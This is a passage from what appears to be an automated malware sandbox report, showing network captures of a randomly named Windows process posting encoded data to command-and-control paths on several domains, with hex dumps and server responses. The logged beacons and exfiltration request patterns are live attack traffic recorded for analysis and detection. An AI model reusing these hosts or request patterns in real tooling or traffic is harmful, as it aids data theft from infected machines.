63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 [TRUNCATED] Data Ascii: 24fc<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.marketplacer.top</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/<![CDATA[/window.trackScriptLoad = function(){};/.../</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">  <a class="b-link" href="https://reg. [TRUNCATED]
Nov 2, 2024 05:26:48.707003117 CET	1236	IN	Data Raw: 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f Data Ascii: v><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.marketplacer.top</h1><p class="b-parking__he
Nov 2, 2024 05:26:48.707011938 CET	1236	IN	Data Raw: d0 b3 d0 b8 d0 b5 20 d1 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 Data Ascii: .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_typ
Nov 2, 2024 05:26:48.707072973 CET	636	IN	Data Raw: 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f Data Ascii: ></li></ul><div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://www.reg.ru/h
Nov 2, 2024 05:26:48.707083941 CET	1236	IN	Data Raw: 5f 70 72 6f 6d 6f 2d 69 74 65 6d 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 62 2d 74 69 74 6c 65 20 62 2d 74 69 74 6c 65 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 22 3e d0 92 d0 b8 d1 Data Ascii: _promo-item_type_hosting"><strong class="b-title b-title_size_large-compact"> , VPS  Dedicated</strong><p class="b-text b-parking__promo-description">
Nov 2, 2024 05:26:48.707093954 CET	212	IN	Data Raw: 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 74 65 6d 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 73 73 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 6d 61 Data Ascii: b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image_type_ssl l-margin_right-large"></span> <strong class="b-title b-title_size_large-compact b-title_margin_
Nov 2, 2024 05:26:48.707103968 CET	1236	IN	Data Raw: 6e 6f 6e 65 22 3e 53 53 4c 2d d1 81 d0 b5 d1 80 d1 82 d0 b8 d1 84 d0 b8 d0 ba d0 b0 d1 82 20 d0 b1 d0 b5 d1 81 d0 bf d0 bb d0 b0 d1 82 d0 bd d0 be 20 d0 bd d0 b0 26 6e 62 73 70 3b 36 20 d0 bc d0 b5 d1 81 d1 8f d1 86 d0 b5 d0 b2 20 3c 2f 73 74 72 Data Ascii: none">SSL-  6 </strong><a class="b-button b-button_color_reference b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_ssl" href="https:
Nov 2, 2024 05:26:48.707118988 CET	212	IN	Data Raw: 64 65 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 64 61 74 61 2e 72 65 66 5f 69 64 20 29 20 7b 0a 20 20 20 Data Ascii: de ) { return; } if ( data.ref_id ) { var links = document.querySelectorAll( 'a' ); for ( var i = 0; i < links.length; i++) {
Nov 2, 2024 05:26:48.707130909 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 69 66 20 28 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66 2e 69 6e 64 65 78 4f 66 28 27 3f 27 29 20 3e 3d 20 30 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 6b 73 5b 20 69 Data Ascii: if ( links[ i ].href.indexOf('?') >= 0 ) { links[ i ].href = links[ i ].href + '&'; } else { links[ i ].href = links[ i ].href + '?'; }
Nov 2, 2024 05:26:48.707140923 CET	1155	IN	Data Raw: 20 73 70 61 6e 73 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 73 70 61 6e 73 5b 20 69 20 5d 2e 63 6c 61 73 73 4e 61 6d 65 2e 6d 61 74 63 68 28 20 2f 5e 70 75 6e 79 2f 20 29 20 29 20 7b 0a 20 Data Ascii: spans.length; i++) { if ( spans[ i ].className.match( /^puny/ ) ) { var text = spans[ i ][ t ]; text = punycode.ToUnicode( text ); spans[ i ][ t ] = text; } else if ( spa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50024	13.248.169.48	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:26:53.903789997 CET	686	OUT	POST /p6wx/ HTTP/1.1 Host: www.sonoscan.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 205 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.sonoscan.org Referer: http://www.sonoscan.org/p6wx/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 67 76 77 54 53 42 38 4a 42 4d 6b 6a 78 71 35 58 75 70 2f 54 45 7a 65 52 6e 53 63 71 31 61 36 6c 55 6f 6c 53 4f 33 56 64 56 56 54 62 47 43 4e 58 4f 47 34 54 65 75 70 39 79 49 65 6a 62 43 2b 44 2b 68 58 66 49 57 66 35 75 33 48 42 69 2f 35 73 69 33 67 52 6d 45 67 6a 69 36 76 2b 7a 4c 51 36 45 6b 73 4f 52 79 62 2f 59 4c 4d 62 41 47 78 4c 74 5a 47 35 7a 65 55 74 44 78 53 48 63 35 70 76 75 4e 6c 53 33 34 66 30 63 70 43 4b 38 76 65 33 55 38 4e 50 39 49 47 66 43 68 4d 76 69 31 33 51 4b 69 62 69 49 61 49 61 4c 4e 4f 64 61 58 32 4c 53 50 38 4b 6a 62 54 6d 57 4f 73 7a 59 35 43 74 6e 41 3d 3d Data Ascii: OrsLbfS8=gvwTSB8JBMkjxq5Xup/TEzeRnScq1a6lUolSO3VdVVTbGCNXOG4Teup9yIejbC+D+hXfIWf5u3HBi/5si3gRmEgji6v+zLQ6EksORyb/YLMbAGxLtZG5zeUtDxSHc5pvuNlS34f0cpCK8ve3U8NP9IGfChMvi13QKibiIaIaLNOdaX2LSP8KjbTmWOszY5CtnA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50025	13.248.169.48	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:26:56.472012043 CET	706	OUT	POST /p6wx/ HTTP/1.1 Host: www.sonoscan.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 225 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.sonoscan.org Referer: http://www.sonoscan.org/p6wx/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 67 76 77 54 53 42 38 4a 42 4d 6b 6a 77 4b 70 58 68 6f 2f 54 56 44 65 53 35 69 63 71 37 4b 36 68 55 6f 70 53 4f 32 52 4e 56 6e 48 62 48 6e 70 58 50 44 59 54 53 4f 70 39 38 6f 65 63 55 69 2b 2b 2b 68 54 68 49 58 6a 35 75 33 44 42 69 2b 4a 73 69 41 30 53 30 6b 67 6c 6b 36 76 72 39 72 51 36 45 6b 73 4f 52 7a 2f 56 59 4c 6b 62 41 58 42 4c 73 34 47 36 73 75 55 71 45 78 53 48 58 5a 70 72 75 4e 6b 42 33 35 44 53 63 72 4b 4b 38 76 75 33 55 75 6c 4d 7a 49 47 56 50 42 4e 39 69 6d 53 70 45 53 2f 71 4c 4b 59 45 45 38 2b 59 53 78 37 52 44 2b 64 64 78 62 33 56 4c 4a 6c 48 56 36 2f 6b 38 50 61 6e 42 6b 30 67 54 5a 70 6d 46 49 48 69 32 4e 47 72 74 41 41 3d Data Ascii: OrsLbfS8=gvwTSB8JBMkjwKpXho/TVDeS5icq7K6hUopSO2RNVnHbHnpXPDYTSOp98oecUi+++hThIXj5u3DBi+JsiA0S0kglk6vr9rQ6EksORz/VYLkbAXBLs4G6suUqExSHXZpruNkB35DScrKK8vu3UulMzIGVPBN9imSpES/qLKYEE8+YSx7RD+ddxb3VLJlHV6/k8PanBk0gTZpmFIHi2NGrtAA=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50026	13.248.169.48	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:26:59.198745012 CET	10788	OUT	POST /p6wx/ HTTP/1.1 Host: www.sonoscan.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 10305 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.sonoscan.org Referer: http://www.sonoscan.org/p6wx/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 67 76 77 54 53 42 38 4a 42 4d 6b 6a 77 4b 70 58 68 6f 2f 54 56 44 65 53 35 69 63 71 37 4b 36 68 55 6f 70 53 4f 32 52 4e 56 6e 66 62 48 55 52 58 4f 6c 51 54 52 4f 70 39 30 49 65 64 55 69 2b 5a 2b 6c 2f 74 49 58 76 44 75 30 33 42 69 63 52 73 31 6b 59 53 74 55 67 6c 6d 36 76 2f 7a 4c 52 67 45 6b 38 4b 52 7a 76 56 59 4c 6b 62 41 56 5a 4c 36 5a 47 36 2f 2b 55 74 44 78 53 62 63 35 70 48 75 4e 38 52 33 36 76 6b 63 37 71 4b 39 4c 43 33 59 39 4e 4d 73 34 47 62 4f 42 4d 34 69 6d 75 49 45 53 69 52 4c 4a 45 69 45 38 4b 59 58 33 57 37 42 4f 42 48 72 49 4c 75 55 70 4a 32 55 59 53 6b 31 63 47 69 42 47 46 37 46 34 4e 62 4b 71 61 52 70 39 36 51 2f 6d 61 77 53 35 48 77 59 4a 7a 78 77 39 4d 76 56 75 42 54 65 66 76 54 59 35 41 67 50 5a 58 37 59 64 58 2b 67 50 59 48 4c 71 62 6a 47 6a 4e 42 50 54 61 38 4d 55 53 79 79 5a 77 37 69 68 75 72 69 5a 74 59 74 32 66 71 44 46 66 6f 67 7a 4c 48 51 43 4c 68 2f 69 79 6d 6d 73 7a 43 58 75 32 4e 2b 4c 50 75 68 42 41 75 54 6c 38 64 36 35 2b 46 65 62 70 7a 65 [TRUNCATED] Data Ascii: OrsLbfS8=gvwTSB8JBMkjwKpXho/TVDeS5icq7K6hUopSO2RNVnfbHURXOlQTROp90IedUi+Z+l/tIXvDu03BicRs1kYStUglm6v/zLRgEk8KRzvVYLkbAVZL6ZG6/+UtDxSbc5pHuN8R36vkc7qK9LC3Y9NMs4GbOBM4imuIESiRLJEiE8KYX3W7BOBHrILuUpJ2UYSk1cGiBGF7F4NbKqaRp96Q/mawS5HwYJzxw9MvVuBTefvTY5AgPZX7YdX+gPYHLqbjGjNBPTa8MUSyyZw7ihuriZtYt2fqDFfogzLHQCLh/iymmszCXu2N+LPuhBAuTl8d65+FebpzecVBoqtMF6hMsewmHKt5nwVKvf99UN0baQNd3GZ7WleEubo27g2OtLpHJQXdnUcT8AMwZzoJz8jys33NHimLG/1x8jnWvJBLrmS2ZZ8Vd0Ekk8kC58FqAtXmFeD70kXzdd4aDd1R76QRnyLXf+a+2jMPyL2TDNxiYp+9PDcXawbNsDIYR6adnBCJdJuy9lEZm92YgJqjdKKedYye5bcCzI12xgquvoWyd+nppvBTi7k1AXV2pU/+rghTqy1PObCOfBZaXlKtdLqKkRpgOtGQoelBQnkhle32M+OcrVybdqODBJ0MzUmoPHlJaYDRew9ezFLzE8gZp1u+HOju4suzSYEyI9PsOhUiWA0Xt5n0cFfND7qOyjz0ecTd+yeXcFP+cqhpTR4NftN0e4IvOrk1JXILaUNzyzyitjDkJiZzmi4EE6rqPkgc7JiS0582cTMvDW+1xH8weJKoZOKJPriGzjNTYDknpXI2hwjKTio8ayhjRQ/odIjc4IbZEwrii/zNhROD2EJ5uj/YC4DaKoPdthdSCI+nrDcI6vq4LQ0GMufBNbeJhXvmRfkPyJkQuwgInq5PDjFO6VYtBLp2pKZrFHW/DIt1jByCc8iDay+ER8LJ84GUe2FcZ64MDQyNtNn9kRu9aan50HTTwneYSMT+UaoUsISX9wfAtb1 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50027	13.248.169.48	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:27:01.822622061 CET	433	OUT	GET /p6wx/?OrsLbfS8=ttYzRxNxeO4f6fNYj7ateA+F6yVy2aipKItROGh8WVTkI3EaJmo1bYoDtPm0Qkaz9X7RChj3n3btpdcutQE91EFehfyc96F4CUsOSCLVSZ8PC2pgtayn56U=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1 Host: www.sonoscan.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Nov 2, 2024 05:27:02.448338032 CET	407	IN	HTTP/1.1 200 OK Server: openresty Date: Sat, 02 Nov 2024 04:27:02 GMT Content-Type: text/html Content-Length: 267 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4f 72 73 4c 62 66 53 38 3d 74 74 59 7a 52 78 4e 78 65 4f 34 66 36 66 4e 59 6a 37 61 74 65 41 2b 46 36 79 56 79 32 61 69 70 4b 49 74 52 4f 47 68 38 57 56 54 6b 49 33 45 61 4a 6d 6f 31 62 59 6f 44 74 50 6d 30 51 6b 61 7a 39 58 37 52 43 68 6a 33 6e 33 62 74 70 64 63 75 74 51 45 39 31 45 46 65 68 66 79 63 39 36 46 34 43 55 73 4f 53 43 4c 56 53 5a 38 50 43 32 70 67 74 61 79 6e 35 36 55 3d 26 35 4a 73 30 58 3d 39 7a 65 78 5f 76 78 50 66 62 70 44 7a 44 50 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?OrsLbfS8=ttYzRxNxeO4f6fNYj7ateA+F6yVy2aipKItROGh8WVTkI3EaJmo1bYoDtPm0Qkaz9X7RChj3n3btpdcutQE91EFehfyc96F4CUsOSCLVSZ8PC2pgtayn56U=&5Js0X=9zex_vxPfbpDzDPp"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50028	162.240.81.18	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:27:16.448836088 CET	707	OUT	POST /6qe4/ HTTP/1.1 Host: www.plazerdigital.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 205 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.plazerdigital.store Referer: http://www.plazerdigital.store/6qe4/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 62 46 69 32 56 30 42 7a 63 68 49 58 65 77 65 6c 46 54 69 6e 44 4b 79 33 4d 65 56 4d 34 52 78 50 31 58 42 6c 6e 77 42 76 52 4f 4e 68 42 45 61 65 47 33 71 64 31 61 35 53 2f 4b 6c 2f 42 52 4a 35 68 32 49 30 6c 76 68 37 37 35 57 50 34 4a 73 71 2b 79 6b 79 48 42 58 73 4a 62 33 54 74 39 42 67 61 44 53 33 50 31 45 4e 31 75 63 76 77 50 63 47 79 65 53 49 77 54 49 61 6a 65 70 68 74 51 6e 36 59 54 6c 70 31 4d 2f 54 4f 4d 44 47 55 2b 57 6b 70 78 66 4d 37 58 36 6b 72 65 37 76 38 71 50 4d 56 6f 4f 72 50 65 57 65 75 41 41 58 59 75 69 48 63 36 71 6f 4d 66 6d 61 39 73 76 78 4a 45 56 34 30 67 3d 3d Data Ascii: OrsLbfS8=bFi2V0BzchIXewelFTinDKy3MeVM4RxP1XBlnwBvRONhBEaeG3qd1a5S/Kl/BRJ5h2I0lvh775WP4Jsq+ykyHBXsJb3Tt9BgaDS3P1EN1ucvwPcGyeSIwTIajephtQn6YTlp1M/TOMDGU+WkpxfM7X6kre7v8qPMVoOrPeWeuAAXYuiHc6qoMfma9svxJEV40g==
Nov 2, 2024 05:27:17.107820988 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sat, 02 Nov 2024 04:27:17 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "663a05b6-e42" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /<![CDATA[/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
Nov 2, 2024 05:27:17.107839108 CET	1236	IN	Data Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
Nov 2, 2024 05:27:17.107850075 CET	1236	IN	Data Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
Nov 2, 2024 05:27:17.107858896 CET	115	IN	Data Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50029	162.240.81.18	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:27:18.998394012 CET	727	OUT	POST /6qe4/ HTTP/1.1 Host: www.plazerdigital.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 225 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.plazerdigital.store Referer: http://www.plazerdigital.store/6qe4/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 62 46 69 32 56 30 42 7a 63 68 49 58 65 51 75 6c 4b 55 2b 6e 4c 4b 79 77 52 75 56 4d 78 78 78 44 31 58 4e 6c 6e 79 73 6f 51 38 35 68 43 68 65 65 46 32 71 64 6d 71 35 53 6e 36 6c 36 4d 78 4a 77 68 32 45 47 6c 75 64 37 37 35 79 50 34 49 63 71 39 43 59 78 47 52 58 71 42 37 33 52 6a 64 42 67 61 44 53 33 50 78 73 72 31 75 30 76 78 38 45 47 30 50 53 50 7a 54 49 5a 79 65 70 68 67 77 6e 2b 59 54 6b 4d 31 4f 4b 30 4f 4f 4c 47 55 2f 6d 6b 70 46 4c 50 79 58 36 2b 6c 2b 36 6c 79 37 53 34 64 5a 4c 69 4f 38 57 52 6f 42 70 33 64 6f 76 64 4e 4c 4c 2f 65 66 43 70 67 72 6d 46 45 48 6f 78 76 73 74 59 73 71 52 74 65 72 33 5a 5a 77 72 44 39 57 79 6d 33 53 6b 3d Data Ascii: OrsLbfS8=bFi2V0BzchIXeQulKU+nLKywRuVMxxxD1XNlnysoQ85hCheeF2qdmq5Sn6l6MxJwh2EGlud775yP4Icq9CYxGRXqB73RjdBgaDS3Pxsr1u0vx8EG0PSPzTIZyephgwn+YTkM1OK0OOLGU/mkpFLPyX6+l+6ly7S4dZLiO8WRoBp3dovdNLL/efCpgrmFEHoxvstYsqRter3ZZwrD9Wym3Sk=
Nov 2, 2024 05:27:19.664345026 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sat, 02 Nov 2024 04:27:19 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "663a05b6-e42" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /<![CDATA[/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
